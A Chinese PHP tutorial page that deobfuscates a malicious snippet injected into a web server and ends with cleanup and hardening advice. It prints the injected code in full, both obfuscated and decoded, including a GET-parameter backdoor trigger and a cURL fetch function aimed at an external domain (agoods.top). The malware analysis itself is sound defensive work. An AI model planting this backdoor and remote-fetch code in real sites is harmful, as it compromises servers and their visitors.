PHP 代码去混淆实践：恶意注入分析与清理指南-php教程-PHP中文网

PHP 代码去混淆实践：恶意注入分析与清理指南

本教程旨在详细指导如何逐步去混淆一段复杂的 PHP 代码，该代码通过 URL 编码、字符串索引访问和混淆变量名等技术隐藏其真实意图。我们将解析其执行逻辑、潜在的恶意行为，并提供清晰的代码重构示例，帮助开发者理解并应对类似的 PHP 恶意代码注入。

PHP 恶意代码去混淆：逐步解析与安全实践

在 web 开发中，服务器被注入恶意代码是一种常见的安全威胁。这些恶意代码通常会经过混淆处理，以逃避检测并增加分析难度。本教程将以一个具体的 php 混淆代码片段为例，详细讲解如何一步步对其进行去混淆，揭示其真实功能，并探讨其潜在的安全风险。

1. 初始混淆代码分析

首先，我们来看这段被发现注入到服务器文件中的 PHP 代码片段：

<?php 
@header('Content-Type:text/html;charset=utf-8');
error_reporting(0); 
$OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c"; 
global $O; 
$O=urldecode($OOOOOO);
if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode($O{58}.$O{55}.$O{9}.$O{15}.$O{9},$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){ 
        echo $O{81}.$O{8}.$O{17}.$O{88}.$O{82};
        exit;
    }else{
        echo $O{81}.$O{13}.$O{10}.$O{7}.$O{18}.$O{88}.$O{82};
        exit;
    }
}

$oOooOO='z0807_1';
$oOooOOoO=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$oOooOO.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9}; 
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    $ooooOOOooOo=curl_init();
    curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
    curl_close($ooooOOOooOo);
    return $oooooOOOOooO; 
}

登录后复制

这段代码的特点是使用了大量难以阅读的变量名（如 $OOOOOO、$oOooOOoO 等），以及通过字符串索引（如 $O{21}）来构建新的字符串，这使得代码的真实意图变得模糊。error_reporting(0) 旨在抑制所有错误报告，进一步隐藏其行为。

2. 逐步去混淆

去混淆过程需要耐心和细致，我们将按照以下步骤进行：

2.1 解码 $OOOOOO 变量

代码的第一步是将 $OOOOOO 变量进行 URL 解码，并赋值给全局变量 $O。这是去混淆的关键第一步，因为它定义了后续所有字符串构建的基础字符集。

立即学习“PHP免费学习笔记（深入）”；

$OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c"; 
global $O; 
$O=urldecode($OOOOOO);

// 解码后，$O 的内容如下：
// $O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?> <.-=:/1230654879';()&^$[]\%{}!*|+,";

登录后复制

这个字符串包含了英文字母（大小写）、数字、特殊符号等，看起来像是键盘上的字符顺序排列。

2.2 替换字符串索引访问

接下来，代码中大量使用了 $O{x} 这种（在 PHP 7.4+ 中已弃用，但在旧版本中有效）的字符串索引访问方式来获取单个字符并拼接成新的字符串。我们需要将所有这些 $O{x} 表达式替换为其对应的实际字符。

例如，$O{21} 对应 $O 字符串中的第22个字符（索引从0开始），即 'c'。

腾讯云AI代码助手

基于混元代码大模型的AI辅助编码工具

查看详情

经过替换后，代码片段将变为：

if($_GET["c"."h"."e"."n"]=="5"."1"."-"."c"."n"){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode("<"."?"."p"."h"."p",$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){ 
        echo "["."o"."k"."!"."]";
        exit;
    }else{
        echo "["."f"."a"."i"."l"."!"."]";
        exit;
    }
}

$oOooOO='z0807_1';
$oOooOOoO="h"."t"."t"."p".":"."/"."/".$oOooOO."."."a"."g"."o"."o"."d"."s"."."."t"."o"."p"; 
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    $ooooOOOooOo=curl_init();
    curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
    curl_close($ooooOOOooOo);
    return $oooooOOOOooO; 
}

登录后复制

2.3 合并字符串字面量

为了提高可读性，我们可以将通过 . 运算符连接的字符串字面量合并成一个完整的字符串。

if($_GET["chen"]=="51-cn"){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode("<?php",$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){ 
        echo "[ok!]";
        exit;
    }else{
        echo "[fail!]";
        exit;
    }
}

$oOooOO='z0807_1';
$oOooOOoO="http://".$oOooOO.".agoods.top"; 
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    $ooooOOOooOo=curl_init();
    curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
    curl_close($ooooOOOooOo);
    return $oooooOOOOooO; 
}

登录后复制

2.4 变量重命名与代码格式化

最后一步是重命名那些混淆的变量，使其具有描述性，并对代码进行格式化，使其更符合标准的可读性规范。同时，将长行代码拆分成多行，提高清晰度。

if($_GET["chen"]=="51-cn"){
    $thisFileSource = file_get_contents(__FILE__);
    $parts = explode("<?php",$thisFileSource);
    if(strpos($parts[1],'%71%77%65')!==false){ 
        echo "[ok!]";
        exit;
    }else{
        echo "[fail!]";
        exit;
    }
}

$subdomain='z0807_1';
$url="http://".$subdomain.".agoods.top"; 

function sendRequest($targetUrl){
    $curlHandle=curl_init();
    curl_setopt ($curlHandle, CURLOPT_URL, $targetUrl);
    curl_setopt ($curlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($curlHandle, CURLOPT_CONNECTTIMEOUT, 5);
    $result = curl_exec($curlHandle);
    curl_close($curlHandle);
    return $result; 
}

登录后复制

3. 代码功能分析与潜在风险

去混淆后的代码揭示了其主要功能：

条件执行检查: 代码首先检查 $_GET 参数中是否存在 chen 键，并且其值是否为 51-cn。如果条件满足，则执行后续逻辑。这通常是一个后门或特定触发机制。
文件内容自检: 如果条件满足，代码会读取当前文件（__FILE__）的全部内容，然后以 <?php 作为分隔符将其分割成数组 $parts。接着，它检查 $parts 数组的第二个元素（即第一个 <?php 标签之后的所有代码）是否包含 %71%77%65 这个字符串（URL解码后为 qwe）。
- 如果包含，则输出 [ok!] 并退出。
- 如果不包含，则输出 [fail!] 并退出。
分析: 这种自检机制看起来有些多余，因为如果代码本身不存在，它就不会运行。如果存在，它总会包含 %71%77%65 (即 $OOOOOO 变量的开头部分)。这可能是为了验证代码的完整性或作为某种调试/确认机制。
外部请求函数定义: 代码定义了一个名为 sendRequest (原 ooooooooOOOOOOOOoooooOOO) 的函数，该函数使用 cURL 库向指定的 URL 发送 GET 请求，并返回响应内容。同时，它构建了一个 URL http://z0807_1.agoods.top，但在这个代码片段中，该 URL 并没有被 sendRequest 函数实际调用。

潜在风险:
- 未执行的外部请求: 虽然 sendRequest 函数和目标 URL 被定义了，但在这个片段中并未被调用。这强烈暗示在服务器上可能存在其他被注入的代码，会调用这个函数，或者这个片段本身只是一个更大恶意脚本的一部分。攻击者通常会通过这种方式从远程服务器获取更多恶意内容，例如广告、重定向脚本、钓鱼页面或更高级的恶意负载。
- 域名 agoods.top: 对 agoods.top 域名的调查显示，它与许多被劫持的网站和恶意活动相关，例如强制用户重定向到虚假的“浏览器更新”页面。这进一步证实了这段代码的恶意性质。
- error_reporting(0): 禁用错误报告是恶意代码的典型特征，旨在避免在执行过程中暴露任何错误信息，从而隐藏其存在和行为。

4. 防范与清理建议

立即隔离: 如果发现此类代码，应立即将受感染的服务器或文件隔离，防止进一步传播或损害。
完整扫描与清理: 对服务器进行全面的恶意软件扫描，查找所有被注入的文件。手动检查所有 PHP 文件，特别是入口文件、公共函数库以及经常被修改的文件。
日志分析: 检查 Web 服务器（如 Apache/Nginx）和 PHP 错误日志，寻找异常请求模式、可疑的 IP 地址或文件访问记录。
更新与打补丁: 确保所有软件（操作系统、Web 服务器、PHP 版本、CMS 系统及插件）都更新到最新版本，并应用所有安全补丁。
强化安全配置:
- 禁用不必要的 PHP 函数（如 eval、shell_exec、system 等）。
- 限制文件上传权限和执行权限。
- 使用 Web 应用防火墙 (WAF) 过滤恶意请求。
- 定期备份数据。
代码审计: 定期对网站代码进行安全审计，查找潜在的漏洞和恶意注入点。
密码安全: 更改所有服务器和数据库密码，确保使用强密码。

总结

去混淆恶意 PHP 代码是识别和应对 Web 安全威胁的关键步骤。通过本文的逐步解析，我们可以看到，即使是看似复杂的混淆代码，通过系统性的分析也能揭示其真实面目。这段代码不仅包含一个用于触发的后门条件，还定义了一个用于外部通信的 cURL 函数，并指向一个已知的恶意域名。理解这些恶意机制有助于我们更好地防范未来的攻击，并采取有效的清理措施来保护服务器和用户数据。

以上就是PHP 代码去混淆实践：恶意注入分析与清理指南的详细内容，更多请关注php中文网其它相关文章！